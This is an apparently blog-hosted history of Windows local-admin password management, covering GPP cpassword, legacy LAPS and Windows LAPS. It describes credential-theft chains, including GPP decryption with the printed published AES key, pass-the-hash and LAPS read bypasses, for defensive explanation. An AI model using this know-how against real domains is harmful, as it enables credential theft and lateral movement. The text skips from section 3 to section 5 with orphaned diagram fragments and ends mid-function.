
The Twenty-Year Local Admin Password Crisis: From GPP cpassword to Windows LAPS

noreply@paragmali.com (Parag Mali) — Wed, 03 Jun 2026 00:00:00 GMT

**Eleven years separated Microsoft's December 2012 architectural articulation of the shared-local-admin problem from the April 11, 2023 in-box default.** Group Policy Preferences "encrypted" the local Administrator password with an AES key Microsoft published in its own protocol specification (2008-2014). MS14-025 disabled new authoring but deleted no SYSVOL artefacts (2014). Legacy LAPS shipped as a separate MSI with plaintext in `ms-Mcs-AdmPwd` (2015-2023). In-box Windows LAPS finally added CNG DPAPI encryption-at-rest, Microsoft Entra ID backup, and post-authentication rotation. The 2026 default is `BackupDirectory = 2` (AD) or `1` (Entra), `PasswordAgeDays` <= 30, `ADPasswordEncryptionEnabled` left at its default `True` (the failure mode is silent fallback to plaintext when the domain functional level is below Windows Server 2016, not an off-by-default bit), `ADPasswordEncryptionPrincipal` overridden to a dedicated decryptor group, and `PostAuthenticationActions` left at default `3` (reset + sign out). The residual attack surface is delegated-decryptor compromise, the screenshotted-password OPSEC tail, unmanaged BYOD endpoints, and the multi-decade tail of un-cleaned SYSVOL `cpassword` XMLs that MS14-025 never deleted.

1. One Password, Fifty Thousand Laptops

In May 2012, a domain user with twelve lines of PowerShell could read the local Administrator password for every machine in the organisation. The tool was Get-GPPPassword.ps1 [@obscuresec-gpp-2012]. The "encryption" was AES-256-CBC with a 32-byte key Microsoft had published in its own protocol specification [@ms-gppref-aes-key] -- not leaked, published, as a feature, so that third-party Group Policy implementations could read the format. Eleven years later, on April 11, 2023, Microsoft finally shipped the in-box fix [@tc-windows-laps-ga-2023].

This is an article about those eleven years.

Pass-the-Hash (PtH): A lateral-movement technique in which an attacker uses the NTLM hash of a captured password directly in an authentication exchange, without recovering the cleartext. If the same local Administrator password is reused across a fleet, one dumped hash unlocks every machine. MITRE catalogues the technique as **T1550.002**.

The pattern was old before 2012. Through the 2000s, the only practical way to provision the local Administrator account on a Windows fleet was to bake one shared password into the reference image and ship the image to every endpoint. Helpdesk knew the password. Pentesters guessed at it. And once Benjamin Delpy's Mimikatz had pulled the hash from a single phished workstation in 2011, the rest of the org fell to a single psexec spray. Microsoft documented the threat model precisely in its December 2012 Mitigating Pass-the-Hash whitepaper [@ms-pth-whitepaper], which named the shared local Administrator credential as the architectural enabler of the entire intrusion class [@mitre-t1550-002].

Microsoft also had a fix. It had shipped one in 2008 with Group Policy Preferences (GPP), the feature that could push a per-machine local-admin password from a Group Policy Object to every endpoint. GPP put the password in an XML file in SYSVOL. SYSVOL was world-readable to every authenticated user in the domain. Microsoft encrypted the password with AES-256-CBC -- and then published the key. The result, after a four-author weaponisation chain in mid-2012 [@sogeti-2012-wayback; @obscuresec-gpp-2012; @rewtdance-gpp-2012; @metasploit-gpp], was that GPP made the original problem worse: instead of one shared password recoverable by physical access to a help-desk laptop, it was now one shared password recoverable by any authenticated domain user with a copy of Get-GPPPassword.ps1. Microsoft "patched" it on May 13, 2014 with MS14-025 [@ms14-025-bulletin], which disabled new authoring but deleted nothing already deployed. Twelve years later, PingCastle still finds the artefacts in production AD [@pingcastle-rules].

The first real fix was Generation 2: the legacy Microsoft LAPS, shipped May 1, 2015 as a separate MSI [@ms-advisory-3062591-wayback]. It stored a per-machine random password in the ms-Mcs-AdmPwd attribute on the computer object, marked CONFIDENTIAL [@adsec-laps-2016]. The directory-side ACL was tighter than SYSVOL, but the deployment surface (install on every endpoint, extend the schema, delegate the OU) capped its real coverage; the password sat in plaintext in AD, one DCSync from "plaintext everywhere"; and a delegation pattern that helpdesks regularly issued -- "All Extended Rights" on the computer OU -- silently included read access to the CONFIDENTIAL attribute [@adsec-laps-2016]. SpecterOps modelled that bypass as the ReadLAPSPassword BloodHound edge on August 7, 2018 [@specterops-bh2].

Generation 3 -- Windows LAPS, in-box, no MSI -- shipped on Patch Tuesday April 11, 2023 [@tc-windows-laps-ga-2023] across Windows 11 22H2 and 21H2, Windows 10 22H2, Windows Server 2022, Windows Server 2019, and Windows Server Annual Channel. Windows Server 2016 was explicitly excluded [@ms-laps-overview]. The new architecture wrapped the password with CNG DPAPI's group key-protector against a configurable principal, exposed Microsoft Entra ID as a peer backup directory [@tc-entra-laps-ga-2023], and added a post-authentication rotation primitive that closed the screenshotted-password OPSEC tail on the next managed-account logon [@ms-laps-policy-settings].

The local Administrator account always has the well-known relative identifier (RID) 500 in the machine's SAM, irrespective of any administrative renaming. Renaming the account at the friendly-name level does not change its SID, which is why Windows LAPS resolves the target account by SID and not by name -- and why an empty AdministratorAccountName policy still finds the right account even on a renamed-built-in host.

Key idea: Microsoft knew the right architecture for managing local Administrator passwords in December 2012, when its own Pass-the-Hash whitepaper named the shared-credential pattern as the architectural enabler of lateral movement. It took until April 11, 2023 to ship that architecture as a Windows default. Eleven years is a long time. The intervening generations each solved part of the previous problem and introduced a new one. The 2026 baseline is, for the first time, an OS-default solution rather than an out-of-band one -- and for the first time, the residual attack surface is the actual surface rather than an artefact of incomplete shipping.

gantt
dateFormat YYYY-MM-DD
axisFormat %Y
title Local-administrator password management on Windows, 1998-2026

section Generation 0 -- Imaged-build era
Shared local admin password baked into image          :gen0, 1998-01-01, 2008-02-26

section Generation 1 -- GPP cpassword
Group Policy Preferences ships in WS2008 RTM           :g1a, 2008-02-27, 2014-05-12
Linda Moore re-posts "Passwords in GPP (Updated)"     :milestone, 2009-04-22, 1d
Sogeti / obscuresec / rewtdance / Metasploit chain    :crit, 2012-04-01, 2012-07-31
MS PtH whitepaper v1 (architecture articulated)       :milestone, 2012-12-01, 1d
MS14-025 disables new authoring (no remediation)      :milestone, 2014-05-13, 1d

section Generation 2 -- Legacy MSI LAPS
Microsoft LAPS GA (KB3062591 MSI)                      :g2a, 2015-05-01, 2023-04-10
Metcalf publishes All-Extended-Rights bypass           :milestone, 2016-08-01, 1d
SpecterOps BloodHound 2.0 ships ReadLAPSPassword edge :milestone, 2018-08-07, 1d

section Generation 3 -- In-box Windows LAPS
Windows LAPS ships in-box (AD backup)                  :crit, 2023-04-11, 2026-12-31
Windows LAPS with Entra ID GA                          :milestone, 2023-10-23, 1d
Win 11 24H2 passphrases and Automatic Account Mgmt    :milestone, 2024-10-01, 1d
Win 11 25H2 Administrator Protection (orthogonal)     :milestone, 2025-11-19, 1d

The article that follows traces the architecture of each generation, the attacks each one solved and each one enabled, and what "standard local admin password management" looks like as a 2026 default. To see why this took twenty years, we have to start in 1998, before Active Directory.

2. Origins: Why Every Workstation Had the Same Local-Admin Password (1998-2008)

Picture a system administrator in 2005. They are holding a CD-R labelled Win-Build-7.iso and a sticky note with a 12-character password. Those two artefacts are the entire local-Administrator-credential lifecycle for ten thousand desktops. The CD will be cloned to a USB drive, the USB drive will reseed Norton Ghost, and Ghost will paint the build onto every new workstation the company buys for the next eight months. Each painted machine will boot with the sticky-note password as its built-in local Administrator. Helpdesk knows the password because they typed it into the image. Five hundred field technicians know the password because they have to be able to recover unmanaged laptops off-network. The pentester who shows up in March will know the password by Tuesday lunch.

This was not a deviation. It was the architecture.

Every Windows machine ships with a built-in local Administrator account whose security identifier ends in the **relative identifier 500**. The RID is constant across machines, languages, and SKUs. Renaming the account changes the friendly name but not the RID, so identity-aware tooling (including Windows LAPS) resolves the account by SID rather than by name. Disabling the account is a configuration choice, not a deletion: the account remains in SAM and can be re-enabled at any time.
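The SID-versus-name point can be made concrete with a minimal sketch. The helper names `rid_of` and `is_builtin_administrator` are hypothetical, and the check only looks at the shape of the SID string (an `S-1-5-21-...` account SID whose last sub-authority is 500); it does not query a SAM or a directory, and it is not how Windows LAPS itself resolves the account.

```python
def rid_of(sid: str) -> int:
    """Return the relative identifier (last sub-authority) of a SID string."""
    parts = sid.split("-")
    if len(parts) < 4 or parts[0] != "S":
        raise ValueError(f"not a SID string: {sid!r}")
    return int(parts[-1])


def is_builtin_administrator(sid: str) -> bool:
    """True when the SID is an account SID (S-1-5-21-...) whose RID is 500.

    The friendly name never enters the check, so a renamed account
    still matches.
    """
    return sid.startswith("S-1-5-21-") and rid_of(sid) == 500
```

Because the name is never consulted, a built-in account renamed to something innocuous is still identified, which is the property the paragraph above relies on.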

The mechanics were a function of how Windows was deployed at scale. Microsoft Sysprep /generalize strips a reference image's machine SID before duplication, but it leaves the SAM intact. Whatever local Administrator password sits in the reference image is the local Administrator password on every endpoint painted from that image. Imaging pipelines were built around this: Norton Ghost in the late 1990s, Microsoft Deployment Toolkit (MDT) and later System Center Configuration Manager Operating System Deployment in the 2000s, all assumed the same SAM. Sean Metcalf's December 2015 SYSVOL retrospective walks the era end-to-end and explains why every shop in the world ended up with a single password [@adsec-gpp-2015].

The operational reality kept the pattern alive. Help-desk needed one known credential to break-glass a laptop that had wandered off the corporate network for six months. Field technicians needed one known credential to swap a failed hard drive on a roof-top kiosk in Houston without phoning home. A known-to-the-org local-admin password was the only realistic fallback path, and the alternative -- a different password per machine, stored somewhere retrievable -- required a retrieval primitive Microsoft had not yet shipped.

The threat model that made the trade-off catastrophic did not get articulated by Microsoft itself until December 2012, in version 1 of the Pass-the-Hash whitepaper [@ms-pth-whitepaper]. The chain was already common knowledge in offensive-security circles: phish a single user, run Benjamin Delpy's 2011-vintage Mimikatz to pull credentials from LSASS, capture the NT hash of the built-in Administrator account, replay that hash to every other host via psexec or wmiexec, and pivot up to the first server an enterprise admin has touched. MITRE catalogues the default-account abuse as T1078.001 [@mitre-t1078-001] and the hash-replay step as T1550.002 [@mitre-t1550-002]. The whitepaper's recommended controls included exactly the architecture Microsoft would eventually ship as LAPS: per-machine random local-admin passwords, rotated frequently, retrievable only by an authorised principal.

The hard part was never the cryptography. It was the operations. A pre-2008 sysadmin who proposed "let's give every workstation a random local-Administrator password" was correctly told that the answer required, at minimum, a directory-scoped retrieval primitive that did not exist; an ACL model that could distinguish "help-desk can read this for their own OU" from "any authenticated user can read this for the whole forest"; and a rotation pipeline that did not depend on the workstation being on the corporate network. Microsoft would not ship those primitives until 2008 (GPP, badly), 2015 (legacy LAPS, well), and 2023 (Windows LAPS, with encryption-at-rest). Until then, "do not get compromised" was the entire mitigation.

The third-party prehistory matters because it set the terms Microsoft would eventually use. PolicyMaker, the engineering parent of what became Group Policy Preferences, was a product of DesktopStandard Corporation that Microsoft acquired in October 2006 [@adsec-gpp-2015]. Thycotic was founded in 1996 by Jonathan Cogley and shipped its Secret Server vault from the mid-2000s [@kuppingercole-cogley]; Lieberman Software (later acquired by Bomgar in January 2018) had operated as Lieberman and Associates since 1978 [@wikipedia-lieberman]; Quest Software was founded in 1987 in Newport Beach, California and was a public company well before the mid-2000s LAPS prehistory began -- its August 14, 1999 NASDAQ IPO saw its shares surge to $47 in a single Wall Street session [@wikipedia-quest; @latimes-quest-ipo-1999]. None of those vendors solved the local-admin-on-every-Windows-machine problem from inside the OS, and Microsoft's own first-party tooling -- restricted groups, logon scripts, Group Policy Object security templates -- offered no rotation primitive at all. The gap was not a knowledge gap; it was a first-party-feature gap.

In February 2008, Microsoft shipped Windows Server 2008. With it came Group Policy Preferences -- and with GPP came a "Local Users and Groups" preference that could push a per-machine local-admin password from a domain GPO to every endpoint in scope. It was the first first-party rotation mechanism Microsoft had ever shipped. It made the problem dramatically worse.

3. Decoration Is Not Encryption: GPP cpassword (2008-2012)

Windows Server 2008 reached release-to-manufacturing in February 2008. Group Policy Preferences shipped with it. The new "Local Users and Groups" preference -- alongside Scheduled Tasks, Services, Data Sources, Drive Maps, and Printers -- could push a password from a GPO down to every endpoint in scope. The password went into an XML file in SYSVOL, the domain's replicated policy share. SYSVOL was world-readable to every authenticated user in the domain. The password was AES-256-CBC encrypted in the XML, in a field called cpassword. The key was a 32-byte value published in [MS-GPPREF] section 2.2.1.1.4 [@ms-gppref-aes-key], in Microsoft's own Open Specifications protocol corpus -- as a feature, so that third-party Group Policy implementations could interoperate.

SYSVOL: A file share replicated to every Domain Controller in an Active Directory domain, used to distribute Group Policy templates and logon scripts. The default share permissions allow **Read** access to every Authenticated User in the forest. Any file placed in SYSVOL is, operationally, readable by every domain user.

cpassword: The XML attribute defined by `[MS-GPPREF]` that carries an encrypted password inside a Group Policy Preferences item. The encryption is AES-256-CBC with a 16-byte zero IV and a static 32-byte key published in the same protocol specification. The name is short for "ciphertext password" and was the canonical search term for finding deployed credentials in SYSVOL between 2012 and 2026.

Client-Side Extension (CSE): A loadable component on each Windows endpoint that processes one class of Group Policy setting. Each preference type (Local Users and Groups, Scheduled Tasks, Services, etc.) is implemented by its own CSE, which runs during the Group Policy refresh cycle. CSEs read the policy XML out of SYSVOL, decrypt any `cpassword` field locally, and apply the setting to the host.
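For defenders, the practical consequence is that leftover `cpassword` attributes can be located with nothing more than a directory walk. The following is a minimal audit sketch, assuming a local or mounted copy of the policy share is available at some path; `find_cpassword_files` is a hypothetical helper name, and the function only reports where the attribute occurs, without decoding it.

```python
import os
import xml.etree.ElementTree as ET


def find_cpassword_files(root_dir: str) -> list[tuple[str, str]]:
    """Walk root_dir and return (path, element tag) for every XML element
    that carries a non-empty cpassword attribute."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in filenames:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except (ET.ParseError, OSError):
                continue  # unreadable or malformed file: skip it
            for elem in tree.iter():
                if elem.attrib.get("cpassword"):
                    hits.append((path, elem.tag))
    return hits
```

Any hit is a credential that should be treated as exposed: the file needs removing from the policy and the affected account needs a new password, since the attribute value was readable by every domain user for as long as it sat in the share.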

Microsoft was not unaware. On April 22, 2009, the Group Policy Team blog re-posted (and updated) a piece by Linda Moore titled "Passwords in Group Policy Preferences (Updated)" [@ms-gp-blog-grouppolicy-2009-wayback]. The phrasing is unambiguous.

the password is not secured. Because the password is stored in SYSVOL, all authenticated users have read access to it. -- Linda Moore, Group Policy Team blog, April 22, 2009 [@ms-gp-blog-grouppolicy-2009-wayback]

The post recommended a list of mitigations: prefer secure mechanisms, audit who can read the SYSVOL share, prefer not to use the field at all. None of those mitigations could rotate the key. None could revoke the static AES-256 key value published in [MS-GPPREF]. Microsoft was telling its customers, in 2009, three years before the public weaponisation, that the credential they were storing was decryptable by every user in the domain by design.

Three years later, the offensive-security community spent twelve weeks turning the publication into a default-on red-team primitive.

In April and May of 2012, Emilien Girault of Sogeti ESEC published a Python decryptor on the firm's research blog [@sogeti-2012-wayback]. The site has since been retired and the canonical reference is the Wayback Machine capture. In mid-May 2012, Chris Campbell (@obscuresec) published Get-GPPPassword.ps1, a PowerShell port that fetched the relevant XML from SYSVOL, decoded the base64, and called .NET's AES primitives with the published key [@obscuresec-gpp-2012]. The script was folded into PowerSploit at Exfiltration/Get-GPPPassword.ps1, where its header still reads "Author: Chris Campbell (@obscuresec)" [@powersploit-getgpppwd] and explicitly credits Emilien Girault for the underlying research. In June 2012, Ben Campbell (the rewtdance.blogspot.com blog handle), working with scriptmonkey (a named collaborator with his own blog at blog.owobble.co.uk), extended the attack to all six XML wire-format carriers that [MS-GPPREF] permits [@rewtdance-gpp-2012]. The rewtdance post body credits the collaboration verbatim: "Working with scriptmonkey (http://blog.owobble.co.uk/), who already had a DC configured, we verified this theory." On July 25, 2012, the Metasploit module post/windows/gather/credentials/gpp.rb landed [@metasploit-gpp] with five co-authors: Ben Campbell, Loic Jaquemet, scriptmonkey, theLightCosine, and mubix. A companion auxiliary scanner, auxiliary/scanner/smb/smb_enum_gpp.rb, was authored independently by Joshua D. Abraham of Praetorian [@metasploit-smb-enum-gpp].

Note: A widespread folk attribution credits Get-GPPPassword.ps1 to "scriptjunkie." The primary sources do not support that claim. The PowerSploit script header credits Chris Campbell (@obscuresec) [@powersploit-getgpppwd]; the rewtdance June 2012 follow-up is by Ben Campbell with scriptmonkey as a named collaborator (scriptmonkey blogs at blog.owobble.co.uk, not at rewtdance) [@rewtdance-gpp-2012]; the Metasploit gpp.rb module's author field names Ben Campbell, Loic Jaquemet, scriptmonkey, theLightCosine, and mubix [@metasploit-gpp]; and the smb_enum_gpp scanner is by Joshua D. Abraham [@metasploit-smb-enum-gpp]. No primary source ties "scriptjunkie" (Matt Weeks) to the GPP cpassword research chain at all. The names are similar; the people are different.

The whole exercise was twelve lines of code. The interesting part was not the cryptography. The interesting part was that the operation was decryption-by-reference: with a published key, the AES envelope was not protecting a secret, it was carrying a secret in a format the protocol specification told everyone how to read.

```
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
```

These bytes are reproduced verbatim from Microsoft's published `[MS-GPPREF]` Group Policy Preferences specification [@ms-gppref-aes-key]. They have appeared in the public Microsoft Open Specifications corpus since the `[MS-GPPREF]` protocol document was first published as part of the Windows Server 2008 protocol-documentation programme; the earliest tangible third-party reuse of the key dates to the April-July 2012 Sogeti / obscuresec / rewtdance / Metasploit research chain [@sogeti-2012-wayback; @obscuresec-gpp-2012; @rewtdance-gpp-2012; @metasploit-gpp]. The key is *not* a secret; it is an interoperability primitive.

ReadSucceeds["Read succeeds (silent CONTROL_ACCESS bypass)"]
ReadFails["Read fails (correctly ACL-gated)"]
Endpoint --> GPRefresh
GPRefresh --> Rotate
Rotate --> SAMWrite
Rotate --> ADWrite
ADWrite --> LDAPRead
LDAPRead --> Bypass
Bypass -- yes --> ReadSucceeds
Bypass -- no --> ReadFails

The other structural limit was the directory's own integrity boundary. The password sat in plaintext in the directory. A stolen NTDS.dit -- obtained via DCSync, NTDSUtil dump, or physical theft of a DC's disk -- exposed every managed local-Administrator password in the forest at once. There was no encryption-at-rest in legacy LAPS, by design. The trust model was "the directory is tier 0 and DCSync is a domain-compromise event already," which is operationally true and architecturally lazy.

Microsoft fixed both of those structural defects on April 11, 2023. The fix shipped in the operating system, with no MSI. We come to it next.

6. The In-Box Era: Windows LAPS (April 11, 2023 to Present)

Patch Tuesday, April 11, 2023. The April cumulative update for Windows 11 22H2 was KB5025239. The Windows 11 21H2 update was KB5025224. Windows 10 22H2 was KB5025221. Windows Server 2022 was KB5025230. Windows Server 2019 was KB5025229. The Server Annual Channel shipped it too. Windows Server 2016 was, and remains, explicitly excluded -- the per-SKU April-2023 cumulative-update KB numbers are catalogued in the Tenable retrospective on the Windows LAPS GA wave [@tc-windows-laps-ga-2023] and the official Microsoft LAPS overview page [@ms-laps-overview]. The MSI was gone. The admpwd.dll Client-Side Extension was gone. In its place: exactly three OS binaries -- laps.dll for core LAPS logic, lapscsp.dll for the Microsoft Intune Configuration Service Provider, and lapspsh.dll for the LAPS PowerShell module -- all shipped together, all part of the OS, all available without installing anything [@ms-laps-concepts-overview; @tc-windows-laps-ga-2023]. The Microsoft Learn laps-concepts-overview page enumerates the three binaries verbatim and lists no fourth.

The most consequential architectural change is the one most often missed.

Note: The legacy admpwd.dll was a Group Policy CSE; its rotation cycle was driven by the GP refresh interval (90 minutes plus jitter on member computers). The new laps.dll is not a CSE. It runs on a hard-coded in-process background timer of approximately one hour inside laps.dll itself -- not a Windows Task Scheduler task, and not configurable. The cited Microsoft Learn page is unambiguous: "Windows LAPS uses a background task that wakes up every hour to process the currently active policy. This task isn't implemented with a Windows Task Scheduler task and isn't configurable." The polling cycle is decoupled from the Group Policy refresh cycle entirely [@ms-laps-concepts-overview]. The implications: the rotation cadence is not configurable below one hour; reducing the GP refresh interval does not accelerate LAPS rotation; the Task Scheduler library will not show a LAPS task because there isn't one; and Windows LAPS will rotate a password on an off-network domain-joined machine the moment it re-establishes line-of-sight to a Domain Controller, regardless of whether a GP refresh has fired.

The new schema added six attributes to the Computer object: msLAPS-Password (the plaintext-fallback location), msLAPS-EncryptedPassword (the CNG-DPAPI-wrapped ciphertext blob), msLAPS-EncryptedPasswordHistory (rotation history), msLAPS-PasswordExpirationTime, msLAPS-EncryptedDSRMPassword (Directory Services Restore Mode account on a DC), and msLAPS-EncryptedDSRMPasswordHistory [@ms-laps-concepts-overview]. The DSRM pair is a Windows-LAPS-only capability; legacy LAPS never covered Domain Controller DSRM accounts. The schema extension is performed once per forest by Update-LapsADSchema, which is idempotent and coexists with the legacy ms-Mcs-AdmPwd attribute [@ms-laps-mig-scenarios].
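When reading these attributes from a raw LDAP export, the expiration value usually needs converting before it is human-readable. The sketch below assumes that msLAPS-PasswordExpirationTime is stored as a Windows FILETIME-style large integer (100-nanosecond ticks since 1601-01-01 UTC), as is conventional for AD time attributes; that storage format is an assumption here, not something the text above states, and the function names are hypothetical.

```python
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond ticks from this epoch (assumed storage format).
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    """Convert a FILETIME tick count to an aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def is_expired(filetime: int, now: datetime) -> bool:
    """True when the stored expiration time is at or before `now`."""
    return filetime_to_datetime(filetime) <= now
```

A caller would pass `datetime.now(timezone.utc)` as `now`; keeping it a parameter makes the check easy to test against fixed timestamps.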

A seventh attribute, msLAPS-CurrentPasswordVersion, exists in the Windows Server 2025 forest schema only. It is added automatically when the first Windows Server 2025 Domain Controller is promoted -- not by running Update-LapsADSchema -- and is used by laps.dll to mitigate a virtual-machine-snapshot torn-state class. The attribute is read-only as far as the LAPS feature is concerned and is not part of the ReadLAPSPassword BloodHound edge's calculus [@ms-laps-concepts-overview].

Encryption-at-rest with CNG DPAPI

The load-bearing addition is encryption of the password before it leaves the client. The mechanism is the CNG DPAPI group key-protector (still commonly called DPAPI-NG in Microsoft's older documentation) [@ms-cng-dpapi]. The client generates the new local-Administrator password, then wraps the plaintext against a security principal SID using the Active Directory Key Distribution Service (KDS) root key infrastructure. The wrapped blob is the only thing the LDAP write places into msLAPS-EncryptedPassword. To decrypt, a reader Kerberos-authenticates to the KDC; only members of the configured principal group at decryption time can derive the protector. The directory itself never sees plaintext, and a stolen NTDS.dit yields ciphertext only [@ms-laps-concepts-overview].

CNG DPAPI group key-protector: A protection mechanism in Windows's CNG (Cryptography API: Next Generation) Data Protection API in which a payload is encrypted against a security principal -- typically an AD group SID -- rather than against a local user. Decryption is gated by Kerberos authentication and the principal's group membership at the time of decryption [@ms-cng-dpapi]. Microsoft Learn currently spells the primitive *"CNG DPAPI"* on the canonical reference; older Microsoft documentation and Win32 references continue to use the shorthand *"DPAPI-NG"*. They are the same primitive.

There are two policy settings that gate the encryption path, and the failure modes are operationally important.

Note: Microsoft Learn's laps-management-policy-settings page lists ADPasswordEncryptionEnabled with a default of True [@ms-laps-policy-settings]. The genuine failure mode is not an unset default; it is silent fallback to plaintext in msLAPS-Password when (a) the domain functional level (DFL) is below Windows Server 2016, or (b) the BackupDirectory value is not 2 (AD). Configure the policy explicitly anyway: the explicit configuration makes the choice visible to policy audits and forces the operator to verify the DFL prerequisite. Do not flip a bit that is already True; do verify the prerequisites that make True work.

Note: When ADPasswordEncryptionPrincipal is unspecified, Windows LAPS wraps the password against the Domain Admins group of the computer's domain [@ms-laps-concepts-overview; @ms-laps-policy-settings]. Most fleets do not want every Domain Admin to be a routine LAPS reader. Configure a dedicated, audited, minimum-membership decryption group (a common naming convention is LAPS-DPAPI-Decryptors) and assign it explicitly. Decryption authority is delegated separately from LDAP read authority; minimising membership of the decryption group is the single most useful hardening lever on a Windows LAPS deployment.

The backup-directory choice

The CSP / GPO node `BackupDirectory` selects where Windows LAPS writes the rotated password. The three valid values are **0** (do not back up; passwords rotate locally but are not retrievable), **1** (Microsoft Entra ID via the `deviceLocalCredentials` resource on Microsoft Graph), and **2** (Active Directory via the `msLAPS-*` attribute set). The values are mutually exclusive per device; a hybrid-joined device can choose either backend but not both [@ms-laps-policy-settings; @ms-laps-entra-scenarios].
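The interaction between `BackupDirectory` and the encryption prerequisites can be summarised as a small decision function. This is a sketch of the behaviour described in this section, not Microsoft's implementation; the enum member names, the `storage_target` function, and the `dfl_at_least_2016` flag are hypothetical names introduced for illustration.

```python
from enum import IntEnum


class BackupDirectory(IntEnum):
    DISABLED = 0          # rotate locally, back up nowhere
    ENTRA_ID = 1          # Microsoft Entra ID (deviceLocalCredentials)
    ACTIVE_DIRECTORY = 2  # msLAPS-* attribute set


def storage_target(backup_directory: int,
                   encryption_enabled: bool = True,
                   dfl_at_least_2016: bool = True) -> str:
    """Return where the rotated password lands under the rules described above."""
    target = BackupDirectory(backup_directory)  # raises ValueError on other values
    if target is BackupDirectory.DISABLED:
        return "none"
    if target is BackupDirectory.ENTRA_ID:
        return "deviceLocalCredentials"
    # AD backup: the encrypted attribute is used only when both prerequisites hold.
    if encryption_enabled and dfl_at_least_2016:
        return "msLAPS-EncryptedPassword"
    return "msLAPS-Password"  # silent plaintext fallback
```

The useful property of writing it this way is that the plaintext branch is explicit: `storage_target(2, dfl_at_least_2016=False)` returns `msLAPS-Password` even though the encryption setting is still `True`, which is exactly the condition a policy audit should flag.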

The Entra-backup path went generally available on October 23, 2023 [@tc-entra-laps-ga-2023]. With BackupDirectory = 1, the local LAPS component posts the rotated password to the deviceLocalCredentials resource on the device object in Microsoft Entra ID via the Microsoft Graph API [@ms-graph-localcredinfo]. Retrieval is via Get-LapsAADPassword (a thin wrapper over the Graph endpoint), the Entra portal Devices blade, or a direct GET /directory/deviceLocalCredentials/{deviceId} call [@ms-laps-entra-scenarios].
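To show what a caller does with the Graph response, here is a minimal sketch that picks the most recent credential from an already-fetched JSON body. The field names (`credentials`, `accountName`, `backupDateTime`, `passwordBase64`) reflect the `deviceLocalCredentialInfo` resource as I understand it and should be checked against the current Graph reference; the UTF-8 decoding and the `latest_password` helper are assumptions for illustration, and no network call is made.

```python
import base64


def latest_password(response: dict) -> tuple[str, str]:
    """Return (account name, password) for the newest credential in a
    deviceLocalCredentials response body that has already been parsed."""
    credentials = response.get("credentials") or []
    if not credentials:
        raise LookupError("response contains no credentials")
    # Assumes backupDateTime values share one ISO 8601 UTC format,
    # so that string comparison orders them chronologically.
    newest = max(credentials, key=lambda cred: cred["backupDateTime"])
    password = base64.b64decode(newest["passwordBase64"]).decode("utf-8")
    return newest["accountName"], password
```

In practice the decoded value should go straight to the operator or a vault and never into logs, since retrieval is the point at which the screenshotted-password tail begins.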

The Entra-backup path has a seven-day minimum for PasswordAgeDays. The AD-backup path's minimum is one day. A tier-0 fleet that targets daily rotation on Entra-joined endpoints will not get daily rotation -- Entra-side policy validation rejects the value. Section 7's baseline table reflects this asymmetry.
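The asymmetry is easy to encode as a pre-deployment check. The sketch below uses only the two minimums stated above; `validate_password_age_days` is a hypothetical helper, and it deliberately enforces no upper bound because none is given in this section.

```python
# Minimum PasswordAgeDays per BackupDirectory value, as stated above.
MIN_PASSWORD_AGE_DAYS = {
    1: 7,  # Microsoft Entra ID backup
    2: 1,  # Active Directory backup
}


def validate_password_age_days(backup_directory: int, days: int) -> int:
    """Return `days` if it meets the minimum for the chosen backend,
    otherwise raise ValueError with the reason."""
    if backup_directory not in MIN_PASSWORD_AGE_DAYS:
        raise ValueError(f"no age minimum defined for BackupDirectory={backup_directory}")
    minimum = MIN_PASSWORD_AGE_DAYS[backup_directory]
    if days < minimum:
        raise ValueError(
            f"PasswordAgeDays={days} is below the minimum of {minimum} "
            f"for BackupDirectory={backup_directory}"
        )
    return days
```

Running a check like this against a planned baseline catches the daily-rotation-on-Entra mistake before the policy is pushed.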

Policy surface and corrections to common misreadings

Windows LAPS is configurable via Group Policy (for AD-joined hosts), the LAPS Configuration Service Provider at ./Device/Vendor/MSFT/LAPS/Policies/* for Intune-managed hosts [@ms-laps-csp], local policy, or the legacy LAPS GPO if PolicySourceMode selects emulation mode. The settings include BackupDirectory, PasswordComplexity (values 1 through 8), PasswordLength, PasswordAgeDays, PostAuthenticationActions, PostAuthenticationResetDelay, AdministratorAccountName, PassphraseLength, ADPasswordEncryptionEnabled, ADPasswordEncryptionPrincipal, and ADBackupDSRMPassword. On Windows 11 24H2 and Windows Server 2025 and later, the policy surface adds Automatic Account Management settings: AutomaticAccountManagementEnabled, AutomaticAccountManagementNameOrPrefix, AutomaticAccountManagementRandomizeName, AutomaticAccountManagementTarget, and AutomaticAccountManagementEnableAccount [@ms-laps-policy-settings; @ms-laps-account-modes].

PostAuthenticationActions: The action Windows LAPS performs after the managed account has authenticated to the host. Valid values are **1** (reset the password), **3** (reset and sign out the interactive session; default), **5** (reset and reboot, with a one-minute reboot delay), and **11** (reset, sign out, and terminate remaining processes; Windows 11 24H2 / Windows Server 2025 and later). The action fires after `PostAuthenticationResetDelay` hours have elapsed since the authentication that triggered it [@ms-laps-policy-settings].

Note: A widespread misreading of the older Microsoft documentation lists PostAuthenticationActions as a 1-2-3 enum. The correct enumeration per the current Microsoft Learn reference [@ms-laps-policy-settings] is 1 (reset password), 3 (reset + sign out; default), 5 (reset + reboot), and 11 (reset + sign out + terminate remaining processes; Win 11 24H2 / Server 2025+). Value 11 is not "force shutdown without warning"; interactive users receive the same non-configurable two-minute warning as on value 3, and remaining processes are terminated after the warning expires. SMB sessions on the host are deleted on values 3 and 11.
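A runbook linter can guard against the 1-2-3 misreading by modelling the enumeration explicitly. The following is an illustrative sketch using only the four values listed above; the member names and helper functions are hypothetical.

```python
from enum import IntEnum


class PostAuthenticationAction(IntEnum):
    RESET = 1
    RESET_AND_SIGN_OUT = 3            # default
    RESET_AND_REBOOT = 5
    RESET_SIGN_OUT_AND_TERMINATE = 11  # Win 11 24H2 / Server 2025 and later


def parse_post_auth_action(value: int) -> PostAuthenticationAction:
    """Reject values such as 2 that are not part of the enumeration."""
    try:
        return PostAuthenticationAction(value)
    except ValueError:
        raise ValueError(
            f"{value} is not a valid PostAuthenticationActions value (use 1, 3, 5 or 11)"
        ) from None


def deletes_smb_sessions(action: PostAuthenticationAction) -> bool:
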